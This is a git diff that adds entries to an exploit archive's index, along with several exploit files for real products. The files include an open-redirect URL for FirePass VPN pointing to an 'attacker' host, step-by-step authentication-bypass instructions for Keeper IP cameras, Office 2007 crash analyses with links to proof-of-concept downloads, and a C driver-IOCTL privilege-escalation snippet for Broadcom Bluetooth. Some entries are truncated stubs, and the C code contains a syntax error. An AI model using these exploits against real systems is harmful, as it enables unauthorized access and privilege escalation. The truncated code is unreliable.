diff --git a/files.csv b/files.csv
index ba2021ec3..9c86d7f23 100755
--- a/files.csv
+++ b/files.csv
@@ -34271,3 +34271,16 @@ id,file,description,date,author,platform,type,port
37956,platforms/php/webapps/37956.txt,"WordPress GeoPlaces3 Theme - Arbitrary File Upload Vulnerbility",2015-08-24,Mdn_Newbie,php,webapps,80
37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - (.gas) Crash POC",2015-08-24,"_ Un_N0n _",windows,dos,0
37958,platforms/multiple/remote/37958.rb,"Firefox PDF.js Privileged Javascript Injection",2015-08-24,metasploit,multiple,remote,0
+37959,platforms/php/webapps/37959.txt,"BSW Gallery 'uploadpic.php' Arbitrary File Upload Vulnerability",2012-10-18,"cr4wl3r ",php,webapps,0
+37960,platforms/php/webapps/37960.txt,"Amateur Photographer's Image Gallery force-download.php file Parameter Information Disclosure",2012-10-18,"cr4wl3r ",php,webapps,0
+37961,platforms/php/webapps/37961.txt,"Amateur Photographer's Image Gallery plist.php albumid Parameter SQL Injection",2012-10-18,"cr4wl3r ",php,webapps,0
+37962,platforms/php/webapps/37962.txt,"Amateur Photographer's Image Gallery plist.php albumid Parameter XSS",2012-10-18,"cr4wl3r ",php,webapps,0
+37963,platforms/php/webapps/37963.txt,"Amateur Photographer's Image Gallery fullscreen.php albumid Parameter SQL Injection",2012-10-18,"cr4wl3r ",php,webapps,0
+37964,platforms/windows/local/37964.c,"Broadcom WIDCOMM Bluetooth 'btkrnl.sys' Driver Local Privilege Escalation Vulnerability",2012-10-18,"Nikita Tarakanov",windows,local,0
+37965,platforms/hardware/webapps/37965.txt,"Keeper IP Camera 3.2.2.10 - Authentication Bypass",2015-08-25,"RAT - ThiefKing",hardware,webapps,0
+37966,platforms/windows/dos/37966.txt,"Microsoft Office 2007 OneTableDocumentStream Invalid Object",2015-08-25,"Google Security Research",windows,dos,0
+37967,platforms/windows/dos/37967.txt,"Microsoft Office 2007 Malformed Document Stack-Based Buffer Overflow",2015-08-25,"Google Security Research",windows,dos,0
+37968,platforms/php/webapps/37968.txt,"CMS Mini 0.2.2 'index.php' Script Cross Site Scripting Vulnerability",2012-10-19,Netsparker,php,webapps,0
+37969,platforms/hardware/remote/37969.txt,"FirePass <= 7.0 SSL VPN 'refreshURL' Parameter URI Redirection Vulnerability",2012-10-21,"Aung Khant",hardware,remote,0
+37970,platforms/php/webapps/37970.html,"WordPress Wordfence Security Plugin Cross Site Scripting Vulnerability",2012-10-18,MustLive,php,webapps,0
+37971,platforms/php/webapps/37971.html,"WHMCS 4.5.2 'googlecheckout.php' SQL Injection Vulnerability",2012-10-22,"Starware Security Team",php,webapps,0
diff --git a/platforms/hardware/remote/37969.txt b/platforms/hardware/remote/37969.txt
new file mode 100755
index 000000000..7e419fb67
--- /dev/null
+++ b/platforms/hardware/remote/37969.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56156/info
+
+FirePass SSL VPN is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks; other attacks are possible.
+
+Versions prior to FirePass 7.0.0 HF-70-7 and 6.1.0 HF-610-9 are vulnerable.
+
+http://www.example.com/my.activation.cns.php3?langchar=&ui_translation=&refreshURL==http://attacker
\ No newline at end of file
diff --git a/platforms/hardware/webapps/37965.txt b/platforms/hardware/webapps/37965.txt
new file mode 100755
index 000000000..8281071dc
--- /dev/null
+++ b/platforms/hardware/webapps/37965.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Keeper IP Camera - Authentication Bypass
+# Date: 25/08/2015
+# Exploit Author: RAT - ThiefKing
+# Vendor Homepage: http://www.keeper.cn/en/Camera-ip.asp
+# Version: 3.2.2.10
+# WEB Version: 6.1.17.192
+# Tested on: QB200W, QB130W, QA130W,...
+
+Exploit:
+1 - First, open your browser
+2 - Enter the IP address or domain to see the login screen of the camera
+3 - Now go to page umanage.asp (http://ipaddress:port/umanage.asp)
+
+You can change or view passwords
+
+TEST: http://server:88/login.asp
+--
+RAT - ThiefKing
+http://tromcap.com
+
+
diff --git a/platforms/php/webapps/37959.txt b/platforms/php/webapps/37959.txt
new file mode 100755
index 000000000..446ff2ea2
--- /dev/null
+++ b/platforms/php/webapps/37959.txt
@@ -0,0 +1,56 @@
+source: http://www.securityfocus.com/bid/56109/info
+
+BSW Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Code in uploadpic.php
+
+print "
+
+
diff --git a/platforms/php/webapps/37971.html b/platforms/php/webapps/37971.html
new file mode 100755
index 000000000..4cf19c10f
--- /dev/null
+++ b/platforms/php/webapps/37971.html
@@ -0,0 +1,37 @@
+source: http://www.securityfocus.com/bid/56173/info
+
+WHMCS (WHM Complete Solution) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+WHMCS 4.5.2 is vulnerable; other versions may also be affected.
+
+#Proof of Concept :
+
+
+
+WHMCS Blind SQL Injection POC
+
+
+
+
+
+
diff --git a/platforms/windows/dos/37966.txt b/platforms/windows/dos/37966.txt
new file mode 100755
index 000000000..1419eb1ef
--- /dev/null
+++ b/platforms/windows/dos/37966.txt
@@ -0,0 +1,68 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=171&can=1
+
+The following access violation was observed in Microsoft Office 2007
+(Word document):
+
+(8c0.e68): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=0012dcf8 ebx=40000000 ecx=40000000 edx=0012de1c esi=40000000 edi=011f1400
+eip=32881800 esp=0012d010 ebp=0012d038 iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
+mso!Ordinal7799+0x2fc:
+32881800 0fb74614 movzx eax,word ptr [esi+0x14] ds:0023:40000014=????
+0:000> k
+ChildEBP RetAddr
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0012d038 328a0a4e mso!Ordinal7799+0x2fc
+0012ddd8 328a0a2c mso!Ordinal4388+0x1bc
+0012dde4 320c337c mso!Ordinal4388+0x19a
+0012de2c 320c330f wwlib!DllGetClassObject+0x850ba
+0012de74 312db32b wwlib!DllGetClassObject+0x8504d
+0012df1c 312dadf8 wwlib!FMain+0x96d7c
+0012df84 312da84c wwlib!FMain+0x96849
+0012e074 6be51b27 wwlib!FMain+0x9629d
+0012e114 6be5c65b MSPTLS!FsDestroyMemory+0x1ee4e
+0012e28c 6be5c94c MSPTLS!FsDestroyMemory+0x29982
+0012e2d8 6be36d59 MSPTLS!FsDestroyMemory+0x29c73
+0012e344 6be37f87 MSPTLS!FsDestroyMemory+0x4080
+0012e450 6be4e8eb MSPTLS!FsDestroyMemory+0x52ae
+0012e4e0 6be4f1ff MSPTLS!FsDestroyMemory+0x1bc12
+0012e584 6be4f362 MSPTLS!FsDestroyMemory+0x1c526
+0012e624 6be4f5cc MSPTLS!FsDestroyMemory+0x1c689
+0012e7d8 6be35d9f MSPTLS!FsDestroyMemory+0x1c8f3
+0012e8ec 6be630b5 MSPTLS!FsDestroyMemory+0x30c6
+0012e970 6be40ee2 MSPTLS!FsDestroyMemory+0x303dc
+0012e9e4 6be63a7a MSPTLS!FsDestroyMemory+0xe209
+
+Notes:
+
+- Reproduce on Windows Server 2003 and Windows 7.
+
+- The crash occurs due to an invalid read dereference of a bad object
+pointer. If the word value read is controlled and set to a value other
+than 0xFFFF, then a controlled value is used as an indirect call
+target (at 328A1DD4 in MSO.dll 12.0.6683.5000).
+
+- The bad object pointer is passed in to MSO.dll from wwlib.dll
+(second argument of function at 328A0A16 in MSO.dll 12.0.6683.5000).
+
+- The test-case reduces to a 50-bit difference from the original
+sample document.
+
+- The affected bits lie in the OneTableDocumentStream's data section,
+as well as as PlcfSed's aCP[0] field and PNFKPPAPX[44]'s pn field.
+
+- The copy operation at 3126A36C (wwlib.dll 12.0.6707.5000) uses a
+source buffer from the OneTableDocumentStream's data section, and
+copies this invalid data into a stack buffer. The bad object pointer
+comes from this stack-based structure.
+
+- Attached files: 037542f7_crash.rtf (crashing file),
+037542f7_orig.doc (original file). A test case with full control of
+the crashing register value (0xAAAAAAAA) is also attached
+(037542f7_full.doc)
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37966.zip
+
diff --git a/platforms/windows/dos/37967.txt b/platforms/windows/dos/37967.txt
new file mode 100755
index 000000000..080d384fa
--- /dev/null
+++ b/platforms/windows/dos/37967.txt
@@ -0,0 +1,65 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=170&can=1
+
+The following access violation was observed in Microsoft Office 2007
+(Word document):
+
+(e24.e28): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=0583a748 ebx=00eb4684 ecx=003ad1a3 edx=00000000 esi=049860bc edi=00122238
+eip=7814500a esp=001221e0 ebp=001221e8 iopl=0 nv up ei pl nz ac pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
+MSVCR80!memcpy+0x5a:
+7814500a f3a5 rep movsd ds:049860bc=???????? es:00122238=3348bcd8
+0:000> k
+ChildEBP RetAddr
+001221e8 31249c0e MSVCR80!memcpy+0x5a
+00122204 3126a371 wwlib!FMain+0x565f
+00122220 3203de3c wwlib!FMain+0x25dc2
+00122268 320dab4c wwlib!DllCanUnloadNow+0x56a6bb
+00122280 31fc363f wwlib!DllGetClassObject+0x9c88a
+0012229c 31f9acde wwlib!DllCanUnloadNow+0x4efebe
+001222b4 31f9b0e5 wwlib!DllCanUnloadNow+0x4c755d
+00122308 31bd68c2 wwlib!DllCanUnloadNow+0x4c7964
+001223bc 3201a69b wwlib!DllCanUnloadNow+0x103141
+00122a68 3129f4eb wwlib!DllCanUnloadNow+0x546f1a
+00123b68 3129e8e5 wwlib!FMain+0x5af3c
+00123bac 32073906 wwlib!FMain+0x5a336
+00126d28 32073627 wwlib!DllGetClassObject+0x35644
+0012b14c 32073294 wwlib!DllGetClassObject+0x35365
+0012b19c 3209ac20 wwlib!DllGetClassObject+0x34fd2
+0012e2f8 3208c781 wwlib!DllGetClassObject+0x5c95e
+0012e31c 31314684 wwlib!DllGetClassObject+0x4e4bf
+0012f580 320e04b7 wwlib!FMain+0xd00d5
+0012f630 320e037f wwlib!DllGetClassObject+0xa21f5
+0012f648 32812493 wwlib!DllGetClassObject+0xa20bd
+
+Notes:
+
+- Reproduces on Windows Server 2003 and Windows 7
+
+- The crash occurs due to a memcpy with an invalid source buffer.
+
+- The invalid source buffer is actually indicative of an invalid size
+being used in a pointer calculation at 3126A360 (wwlib.dll
+12.0.6707.5000). This invalid size can also be seen in ecx at the time
+of access violation.
+
+- The large size parameter can result in a stack-based buffer overflow.
+
+- Alternatively, if the copy operation succeeds (by using a size value
+large enough to result in an out-of-bounds source buffer, but not so
+large to cause an access violation during copy), then it is also
+possible to get an arbitrary free from later usage of controlled
+pointers in the destination buffer.
+
+- The crashing test case was created using a chunk reordering
+strategy, and does not cleanly minimize (106 bit change from original
+file).
+
+- Attached files: 86ea4a3c_crash.rtf (crashing file),
+86ea4a3c_orig.doc (original file)
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37967.zip
+
diff --git a/platforms/windows/local/37964.c b/platforms/windows/local/37964.c
new file mode 100755
index 000000000..e3cab7276
--- /dev/null
+++ b/platforms/windows/local/37964.c
@@ -0,0 +1,41 @@
+source: http://www.securityfocus.com/bid/56124/info
+
+Broadcom WIDCOMM Bluetooth is prone to a local privilege-escalation vulnerability.
+
+A local attacker may exploit this issue to gain escalated privileges and execute arbitrary code with kernel privileges. Failed exploit attempts may result in a denial-of-service condition.
+
+Broadcom WIDCOMM Bluetooth 5.6.0.6950 is vulnerable; other versions may also be affected.
+
+HANDLE hDevice;
+ char *inbuff, *outbuff;
+ DWORD ioctl, len,;
+
+ if ( (hDevice = CreateFileA("\\\\.\\btkrnl",
+ 0,
+ 0,
+ 0,
+ OPEN_EXISTING,
+ 0,
+ NULL) ) != INVALID_HANDLE_VALUE )
+ {
+ printf("Device succesfully opened!\n");
+ }
+ else
+ {
+ printf("Error: Error opening device \n");
+ return 0;
+ }
+ inbuff = (char*)malloc(0x12000);
+ if(!inbuff){
+ printf("malloc failed!\n");
+ return 0;
+ }
+ outbuff = (char*)malloc(0x12000);
+ if(!outbuff){
+ printf("malloc failed!\n");
+ return 0;
+ }
+ ioctl = 0x2A04C0;
+ memset(inbuff, 0x41, 0x70);
+ DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff, 0x70, (LPVOID)outbuff, 0x70, &len, NULL);
+